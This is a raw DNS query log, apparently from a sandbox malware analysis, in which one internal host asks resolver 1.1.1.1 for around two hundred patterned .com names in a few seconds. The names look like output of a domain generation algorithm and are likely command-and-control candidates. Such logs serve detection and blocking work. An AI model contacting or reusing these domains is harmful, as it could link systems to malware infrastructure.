                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.588787079 CET192.168.2.61.1.1.10x9e6cStandard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.588787079 CET192.168.2.61.1.1.10x8c40Standard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.598807096 CET192.168.2.61.1.1.10x7cecStandard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.599735975 CET192.168.2.61.1.1.10xa4a9Standard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.600119114 CET192.168.2.61.1.1.10x2f4aStandard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.600238085 CET192.168.2.61.1.1.10x91a0Standard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.600238085 CET192.168.2.61.1.1.10x2b3Standard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.600434065 CET192.168.2.61.1.1.10x9e5aStandard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.600759029 CET192.168.2.61.1.1.10x62Standard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.601049900 CET192.168.2.61.1.1.10xe90bStandard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.601586103 CET192.168.2.61.1.1.10xdc22Standard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.604738951 CET192.168.2.61.1.1.10x6deeStandard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.604931116 CET192.168.2.61.1.1.10x1cfcStandard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.605211973 CET192.168.2.61.1.1.10x896aStandard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.605314970 CET192.168.2.61.1.1.10xce7bStandard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.605635881 CET192.168.2.61.1.1.10x4f04Standard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.605635881 CET192.168.2.61.1.1.10x67d4Standard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.605829954 CET192.168.2.61.1.1.10xe84Standard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.605829954 CET192.168.2.61.1.1.10xf8e8Standard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.606009960 CET192.168.2.61.1.1.10xb50Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.606009960 CET192.168.2.61.1.1.10x2ab9Standard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.606311083 CET192.168.2.61.1.1.10xf306Standard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.606311083 CET192.168.2.61.1.1.10x4221Standard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.606484890 CET192.168.2.61.1.1.10xd125Standard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.606484890 CET192.168.2.61.1.1.10x8fb2Standard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.612479925 CET192.168.2.61.1.1.10x3e27Standard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.100918055 CET192.168.2.61.1.1.10xf713Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.323178053 CET192.168.2.61.1.1.10xdb5dStandard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.557375908 CET192.168.2.61.1.1.10x7e35Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.557375908 CET192.168.2.61.1.1.10x5893Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.563910961 CET192.168.2.61.1.1.10x5cf1Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.564131975 CET192.168.2.61.1.1.10xd529Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.564300060 CET192.168.2.61.1.1.10x1d17Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.570097923 CET192.168.2.61.1.1.10x5e2dStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.570377111 CET192.168.2.61.1.1.10xb3fcStandard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.594202042 CET192.168.2.61.1.1.10x6715Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.594429016 CET192.168.2.61.1.1.10xf1f6Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.594454050 CET192.168.2.61.1.1.10xb6bdStandard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.594691038 CET192.168.2.61.1.1.10x8154Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.594943047 CET192.168.2.61.1.1.10x4631Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.595113993 CET192.168.2.61.1.1.10xcf17Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.595292091 CET192.168.2.61.1.1.10x7e09Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.595525980 CET192.168.2.61.1.1.10x54a3Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.595700979 CET192.168.2.61.1.1.10xa3d2Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.596086025 CET192.168.2.61.1.1.10x63b1Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.596328020 CET192.168.2.61.1.1.10xd69eStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.627446890 CET192.168.2.61.1.1.10x9de6Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.841991901 CET192.168.2.61.1.1.10xdc62Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.843177080 CET192.168.2.61.1.1.10x3f98Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.844007969 CET192.168.2.61.1.1.10x1933Standard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.855186939 CET192.168.2.61.1.1.10x6687Standard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.855288982 CET192.168.2.61.1.1.10x6e7dStandard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.866982937 CET192.168.2.61.1.1.10xe526Standard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.871445894 CET192.168.2.61.1.1.10x72b6Standard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.877566099 CET192.168.2.61.1.1.10x4ad7Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.884262085 CET192.168.2.61.1.1.10xdf9fStandard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.886809111 CET192.168.2.61.1.1.10x7856Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.894273996 CET192.168.2.61.1.1.10x88b0Standard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.895488024 CET192.168.2.61.1.1.10xcebaStandard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.901329994 CET192.168.2.61.1.1.10xd4a2Standard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.904342890 CET192.168.2.61.1.1.10xe69Standard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.905749083 CET192.168.2.61.1.1.10x4969Standard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.907253981 CET192.168.2.61.1.1.10x6aStandard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.912337065 CET192.168.2.61.1.1.10x645aStandard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.914239883 CET192.168.2.61.1.1.10x9dc8Standard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.919830084 CET192.168.2.61.1.1.10x34a8Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.185297012 CET192.168.2.61.1.1.10xdb15Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.234761000 CET192.168.2.61.1.1.10x4fafStandard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.235008001 CET192.168.2.61.1.1.10x4777Standard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.237982035 CET192.168.2.61.1.1.10xe9baStandard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.245083094 CET192.168.2.61.1.1.10x8463Standard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.245568037 CET192.168.2.61.1.1.10xaba8Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.260066986 CET192.168.2.61.1.1.10x5592Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.260271072 CET192.168.2.61.1.1.10x2762Standard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.260672092 CET192.168.2.61.1.1.10x763eStandard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.261075974 CET192.168.2.61.1.1.10x68baStandard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.261475086 CET192.168.2.61.1.1.10x2887Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.261826038 CET192.168.2.61.1.1.10x1960Standard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.262222052 CET192.168.2.61.1.1.10x718fStandard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.262967110 CET192.168.2.61.1.1.10xb5bfStandard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.400259972 CET192.168.2.61.1.1.10xa2dfStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.400543928 CET192.168.2.61.1.1.10x5c37Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.401227951 CET192.168.2.61.1.1.10xe562Standard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.401585102 CET192.168.2.61.1.1.10x146bStandard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.401737928 CET192.168.2.61.1.1.10xc685Standard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.412195921 CET192.168.2.61.1.1.10x8885Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.412431955 CET192.168.2.61.1.1.10xa47eStandard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.659071922 CET192.168.2.61.1.1.10xeaa0Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.220727921 CET192.168.2.61.1.1.10xc378Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.226500988 CET192.168.2.61.1.1.10x349Standard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.226670027 CET192.168.2.61.1.1.10xd60cStandard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.226757050 CET192.168.2.61.1.1.10xa7d8Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.296760082 CET192.168.2.61.1.1.10xbc75Standard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.296957970 CET192.168.2.61.1.1.10x39cdStandard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297101021 CET192.168.2.61.1.1.10x9c90Standard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297239065 CET192.168.2.61.1.1.10xc1a7Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297374964 CET192.168.2.61.1.1.10xcfa8Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297518969 CET192.168.2.61.1.1.10x7bf7Standard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297668934 CET192.168.2.61.1.1.10xe43eStandard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297806025 CET192.168.2.61.1.1.10xb5faStandard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297996998 CET192.168.2.61.1.1.10x88b6Standard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.298548937 CET192.168.2.61.1.1.10x9b83Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.298904896 CET192.168.2.61.1.1.10x89b3Standard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.299509048 CET192.168.2.61.1.1.10x91eStandard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.299675941 CET192.168.2.61.1.1.10x8dcdStandard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.299931049 CET192.168.2.61.1.1.10xecf4Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.300080061 CET192.168.2.61.1.1.10x68fStandard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.300224066 CET192.168.2.61.1.1.10x21a0Standard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.300385952 CET192.168.2.61.1.1.10x6718Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.302961111 CET192.168.2.61.1.1.10x4351Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.315238953 CET192.168.2.61.1.1.10xcdbbStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.315777063 CET192.168.2.61.1.1.10x76aeStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.317702055 CET192.168.2.61.1.1.10xb982Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.318222046 CET192.168.2.61.1.1.10x5372Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.321271896 CET192.168.2.61.1.1.10x9e2eStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.321518898 CET192.168.2.61.1.1.10x2e76Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.326966047 CET192.168.2.61.1.1.10xb084Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.332813978 CET192.168.2.61.1.1.10x7c62Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.341370106 CET192.168.2.61.1.1.10x890bStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.343056917 CET192.168.2.61.1.1.10x834bStandard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.346266985 CET192.168.2.61.1.1.10xb67bStandard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.394988060 CET192.168.2.61.1.1.10x390aStandard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.395199060 CET192.168.2.61.1.1.10xe6c5Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.399156094 CET192.168.2.61.1.1.10xce1aStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.401038885 CET192.168.2.61.1.1.10xc1e4Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.401431084 CET192.168.2.61.1.1.10x9beStandard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.407453060 CET192.168.2.61.1.1.10x4217Standard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.474196911 CET192.168.2.61.1.1.10xd65aStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.477722883 CET192.168.2.61.1.1.10xd39aStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.564053059 CET192.168.2.61.1.1.10x1074Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.568816900 CET192.168.2.61.1.1.10x9eaStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.034383059 CET192.168.2.61.1.1.10x5096Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.054358959 CET192.168.2.61.1.1.10x11cStandard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.130157948 CET192.168.2.61.1.1.10xe74eStandard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.144282103 CET192.168.2.61.1.1.10x78cbStandard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.145277023 CET192.168.2.61.1.1.10x8a1Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.151777983 CET192.168.2.61.1.1.10x9c85Standard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.168847084 CET192.168.2.61.1.1.10x9c61Standard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.200845957 CET192.168.2.61.1.1.10x8952Standard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.223198891 CET192.168.2.61.1.1.10x1b84Standard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.604166031 CET192.168.2.61.1.1.10x58d8Standard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.615231037 CET192.168.2.61.1.1.10xd1ebStandard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.615686893 CET192.168.2.61.1.1.10xfa1eStandard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.616175890 CET192.168.2.61.1.1.10xb8cStandard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.616507053 CET192.168.2.61.1.1.10xd1a8Standard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.616853952 CET192.168.2.61.1.1.10xf87dStandard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.616916895 CET192.168.2.61.1.1.10x3a71Standard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.617285013 CET192.168.2.61.1.1.10x3770Standard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.617721081 CET192.168.2.61.1.1.10xd88cStandard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.617847919 CET192.168.2.61.1.1.10x1412Standard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.618421078 CET192.168.2.61.1.1.10x9cf6Standard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.619286060 CET192.168.2.61.1.1.10x7de1Standard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.619904041 CET192.168.2.61.1.1.10x3e27Standard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.639509916 CET192.168.2.61.1.1.10x8848Standard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.640820026 CET192.168.2.61.1.1.10xc056Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.661923885 CET192.168.2.61.1.1.10x4802Standard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.662106037 CET192.168.2.61.1.1.10xc188Standard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.662287951 CET192.168.2.61.1.1.10xc10cStandard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.662441015 CET192.168.2.61.1.1.10x402cStandard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.662607908 CET192.168.2.61.1.1.10xe2e7Standard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.662767887 CET192.168.2.61.1.1.10xadaStandard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.663192987 CET192.168.2.61.1.1.10xb479Standard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.663336992 CET192.168.2.61.1.1.10x962dStandard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.663486958 CET192.168.2.61.1.1.10xfe7dStandard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.663616896 CET192.168.2.61.1.1.10xdbbfStandard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.663743019 CET192.168.2.61.1.1.10x876Standard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664007902 CET192.168.2.61.1.1.10x55afStandard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664086103 CET192.168.2.61.1.1.10x71a3Standard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664158106 CET192.168.2.61.1.1.10xd48bStandard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664308071 CET192.168.2.61.1.1.10x6389Standard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664328098 CET192.168.2.61.1.1.10x44c8Standard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664504051 CET192.168.2.61.1.1.10xd797Standard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664529085 CET192.168.2.61.1.1.10xfc6eStandard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664688110 CET192.168.2.61.1.1.10xaacdStandard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664702892 CET192.168.2.61.1.1.10xb3c2Standard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.706695080 CET192.168.2.61.1.1.10x4668Standard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707467079 CET192.168.2.61.1.1.10xe260Standard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707623959 CET192.168.2.61.1.1.10x5935Standard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707811117 CET192.168.2.61.1.1.10x496cStandard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707942963 CET192.168.2.61.1.1.10x3cb9Standard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708142996 CET192.168.2.61.1.1.10x4e36Standard query (0)qetylip.comA (IP address)IN (0x0001)false
